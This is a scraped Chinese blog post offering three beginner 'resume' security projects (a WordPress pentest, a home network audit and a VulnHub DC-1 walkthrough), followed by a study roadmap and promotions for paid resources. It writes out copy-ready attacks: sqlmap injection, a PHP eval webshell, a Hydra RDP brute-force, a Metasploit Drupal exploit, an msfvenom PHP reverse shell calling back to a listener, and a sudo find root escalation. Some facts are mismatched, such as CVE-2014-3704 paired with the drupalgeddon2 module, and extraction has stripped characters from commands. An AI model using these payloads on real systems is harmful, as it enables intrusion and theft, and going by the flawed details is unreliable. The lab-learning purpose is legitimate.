2026/1/3 2:57:21
网站建设
项目流程
建设厂招工信息网站,新吴区推荐做网站价格,关键词排名优化如何,phpmysql网站开发案例转行网络安全实战#xff1a;3 个适合新手的个人项目#xff08;附实现步骤#xff09;
引言
很多转行同学学了工具却没项目经验#xff0c;简历只能写 “会用 Burp Suite”#xff0c;面试时被问 “做过什么实战#xff1f;” 就卡壳。其实新手不用等企业项目#xf…转行网络安全实战3 个适合新手的个人项目附实现步骤引言很多转行同学学了工具却没项目经验简历只能写 “会用 Burp Suite”面试时被问 “做过什么实战” 就卡壳。其实新手不用等企业项目3 个简单的个人项目就能积累经验 —— 既能练技术又能写进简历让面试官眼前一亮。本文的 3 个项目均为零基础可实现附详细步骤看完就能动手做。一、项目 1个人博客渗透测试练 Web 漏洞利用适合简历加分1. 项目目标搭建个人博客如 WordPress模拟黑客视角进行渗透测试发现并利用 SQL 注入、XSS、文件上传等漏洞最终获取服务器控制权getshell生成渗透报告。2. 实现步骤总耗时2 天步骤 1搭建博客环境1 小时用 Docker 快速部署 WordPress安装 Docker 后执行命令docker run -d -p 8080:80 --name wordpress -e WORDPRESS_DB_HOSTdb:3306 -e WORDPRESS_DB_USERroot -e WORDPRESS_DB_PASSWORD123456 -e WORDPRESS_DB_NAMEwordpress --link mysql:db wordpress同时启动 MySQLdocker run -d --name mysql -e MYSQL_ROOT_PASSWORD123456 -e MYSQL_DATABASEwordpress mysql:5.7访问http://localhost:8080按提示完成 WordPress 安装设置账号admin密码admin123。步骤 2信息收集2 小时用 Nmap 扫描博客端口nmap -sV 127.0.0.1 -p 8080确认 8080 端口开放服务为 Apache用 Wappalyzer 插件Chrome 扩展查看博客技术栈WordPress 6.0 PHP 7.4 MySQL 5.7访问http://localhost:8080/wp-login.php确认登录页存在后续可测试暴力破解。步骤 3漏洞扫描与利用3 小时SQL 注入测试访问博客文章页如http://localhost:8080/?p1用 Burp 抓包将p1改为p1’ and 11–观察页面是否正常正常则可能存在注入用 Sqlmap 自动化注入sqlmap -u “http://localhost:8080/?p1” --dbs获取数据库列表含wordpress库进一步导出wp_users表的账号密码哈希。文件上传漏洞测试登录 WordPress 后台进入 “外观→主题编辑器”尝试上传恶意 PHP 文件如shell.php内容?php eval($\_POST\[cmd\]);?若上传成功访问http://localhost:8080/wp-content/themes/twentytwentyone/shell.php用中国蚁剑连接URL 填该地址密码cmd成功 getshell。步骤 4生成渗透报告2 小时报告结构项目背景测试目标个人 WordPress 博客、测试范围8080 端口漏洞详情SQL 注入高危漏洞位置/?p1、利用步骤Sqlmap 命令、危害可导出用户数据文件上传高危漏洞位置主题编辑器、利用步骤上传 shell.php、危害获取服务器控制权修复建议SQL 注入用预编译语句文件上传限制 PHP 文件上传、校验文件内容。3. 转行价值简历写法“独立完成个人 WordPress 博客渗透测试项目通过 Sqlmap 发现 SQL 注入漏洞并导出用户数据利用主题编辑器文件上传漏洞 getshell生成包含 2 个高危漏洞的渗透报告”技能提升练信息收集、SQL 注入、文件上传、getshell覆盖 Web 渗透核心流程。二、项目 2家庭网络安全审计练内网安全适合安全运维转行1. 项目目标对家庭网络含路由器、智能摄像头、电脑进行安全审计发现弱密码、未授权访问、端口开放等问题提供整改方案保障家庭网络安全。2. 实现步骤总耗时1 天步骤 1家庭网络拓扑梳理1 小时查看路由器后台如 192.168.1.1获取所有设备的 IP 和 MAC 地址如电脑 192.168.1.100、摄像头 192.168.1.103记录设备类型、品牌如小米摄像头、TP-Link 路由器便于后续针对性测试。步骤 2设备安全扫描3 小时路由器安全测试测试弱密码尝试用默认密码如 admin/admin、常见密码123456登录路由器后台若成功则存在弱密码问题查看端口开放用 Nmap 扫描路由器 IP192.168.1.1nmap -p 1-65535 192.168.1.1若开放 22SSH、8080管理端口且无密码保护存在风险。智能摄像头测试查找摄像头默认端口如 RTSP 端口 554用 Nmap 扫描nmap -p 554 192.168.1.103若端口开放尝试用默认账号如 user/admin登录 RTSP 流工具VLC 播放器输入rtsp://192.168.1.103:554/stream1若成功则存在未授权访问。家庭电脑测试扫描开放端口nmap -sV 192.168.1.100若开放 3389远程桌面且无密码存在远程登录风险检查弱密码用 Hydra 爆破 Windows 账号密码hydra -l Administrator -P pass.txt 192.168.1.100 rdp若成功则需修改密码。步骤 3生成审计报告与整改方案2 小时报告重点问题清单路由器弱密码、摄像头未授权访问、电脑 3389 端口开放整改方案路由器修改默认密码8 位以上含特殊字符、关闭不必要端口如 22摄像头修改默认账号密码、禁用公网访问电脑关闭 3389 端口、设置复杂密码字母 数字 特殊字符。3. 转行价值简历写法“完成家庭网络安全审计项目扫描 3 台设备路由器、摄像头、电脑发现 3 个安全问题弱密码、未授权访问、端口开放制定针对性整改方案提升家庭网络安全性”技能提升练内网设备扫描、弱密码检测、端口风险评估贴合安全运维岗位需求。三、项目 3漏洞靶场闯关练漏洞复现适合渗透测试转行1. 项目目标挑战 VulnHub 的 “DC-1” 靶场免费适合新手通过信息收集、漏洞利用、提权最终找到靶场隐藏的 “flag” 文件完成闯关积累漏洞复现经验。2. 实现步骤总耗时3 天步骤 1下载并启动靶场1 小时下载 DC-1 靶场VulnHub 官网https://www.vulnhub.com/entry/dc-1,292/下载 OVA 文件用 VMware 导入 OVA 文件设置网络为 “桥接模式”启动靶场靶场无固定 IP需扫描获取。步骤 2信息收集与漏洞发现2 小时扫描局域网 IP找到靶场 IPnmap -sn 192.168.1.0/24假设靶场 IP 为 192.168.1.105扫描靶场端口nmap -sV 192.168.1.105发现开放 80Apache、22SSH端口访问 80 端口http://192.168.1.105发现是 Drupal CMS 网站版本 7.x。步骤 3漏洞利用4 小时Drupal 漏洞利用查阅资料可知 Drupal 7.x 存在 SQL 注入漏洞CVE-2014-3704用 Metasploit 加载对应模块use exploit/unix/webapp/drupal_drupalgeddon2设置参数set RHOSTS 192.168.1.105→run获取靶场 Shell。查找第一个 flag在 Shell 中执行ls找到flag1.txt内容“Every good CMS needs a config file - and so do you!”提示找配置文件查看 Drupal 配置文件sites/default/settings.php找到数据库账号密码dbuser:dbpass。步骤 4提权3 小时登录数据库执行mysql -u dbuser -p输入密码dbpass进入数据库查看users表发现管理员账号admin的密码哈希。破解密码与提权用 John the Ripper 破解哈希john --wordlistrockyou.txt hash.txt得到admin密码rosebud用admin/rosebud登录 Drupal 后台通过 “模块管理” 上传 PHP 反弹 Shell工具msfvenom 生成 Shellmsfvenom -p php/meterpreter/reverse_tcp LHOST192.168.1.100 LPORT4444 -f raw shell.php启动 Metasploit 监听use exploit/multi/handler→set PAYLOAD php/meterpreter/reverse_tcp→set LHOST 192.168.1.100→run访问shell.php获取 Meterpreter 会话执行sudo -l发现可无密码执行find命令利用find提权sudo find / -exec /bin/sh ; -quit获取 root 权限。步骤 5找到所有 flag1 小时执行find / -name “flag*.txt”找到剩余 4 个 flag 文件记录内容完成闯关。3. 转行价值简历写法“独立完成 VulnHub DC-1 靶场闯关项目利用 Drupal SQL 注入漏洞获取 Shell通过 John the Ripper 破解密码、find 命令提权最终找到 5 个 flag 文件积累 CMS 漏洞利用与 Linux 提权经验”技能提升练 CMS 漏洞、SQL 注入、密码破解、Linux 提权贴合渗透测试岗位核心需求。总结3 个项目均为零基础可实现且能直接写进简历博客渗透练 Web 漏洞家庭审计练内网安全靶场闯关练综合渗透。建议按 “项目 1→项目 3→项目 2” 的顺序做逐步提升难度。评论区说说你想先做哪个项目帮你补充细节网络安全学习路线学习资源网络安全的知识多而杂怎么科学合理安排下面给大家总结了一套适用于网安零基础的学习路线应届生和转行人员都适用学完保底6k就算你底子差如果能趁着网安良好的发展势头不断学习日后跳槽大厂、拿到百万年薪也不是不可能初级网工1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗【“脚本小子”成长进阶资源领取】7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime ·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完 ·用Python编写漏洞的exp,然后写一个简单的网络爬虫 ·PHP基本语法学习并书写一个简单的博客系统 熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选) ·了解Bootstrap的布局或者CSS。8、超级网工这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。感兴趣的童鞋可以研究一下不懂得地方可以【点这里】加我耗油跟我学习交流一下。网络安全工程师企业级学习路线如图片过大被平台压缩导致看不清的话可以【点这里】加我耗油发给你大家也可以一起学习交流一下。一些我自己买的、其他平台白嫖不到的视频教程需要的话可以扫描下方卡片加我耗油发给你都是无偿分享的大家也可以一起学习交流一下。网络安全学习路线学习资源结语网络安全产业就像一个江湖各色人等聚集。相对于欧美国家基础扎实懂加密、会防护、能挖洞、擅工程的众多名门正派我国的人才更多的属于旁门左道很多白帽子可能会不服气因此在未来的人才培养和建设上需要调整结构鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”才能解人才之渴真正的为社会全面互联网化提供安全保障。特别声明此教程为纯技术分享本书的目的决不是为那些怀有不良动机的人提供及技术支持也不承担因为技术被滥用所产生的连带责任本书的目的在于最大限度地唤醒大家对网络安全的重视并采取相应的安全措施从而减少由网络安全而带来的经济损失